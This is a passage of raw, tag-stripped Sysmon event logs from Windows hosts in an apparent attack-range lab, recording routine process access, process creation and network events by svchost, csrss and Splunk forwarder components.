12:21:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E44B-63C7-2306-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.463{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E44B-63C7-2306-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:31.464{FE4C2B44-E44B-63C7-2306-00000000AF02}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:32.869{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF54A47107585DC61A34D02C66A4D47C,SHA256=A3C4381E8E71EE338AE38B30E3B0E7EB22AF6C3F2E832ADDF98FFC89690233F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016398Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E44C-63C7-0102-00000000B002}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016397Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016396Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016395Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016394Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016393Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016392Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016391Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016390Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016389Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016388Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E44C-63C7-0102-00000000B002}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016387Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.878{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E44C-63C7-0102-00000000B002}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016386Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.879{E5A8D418-E44C-63C7-0102-00000000B002}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016385Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.449{E5A8D418-E44C-63C7-0002-00000000B002}38803976C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016384Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:30.124{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50090-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000016383Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E44C-63C7-0002-00000000B002}3880C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016382Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016381Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016380Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016379Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:32.262{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL3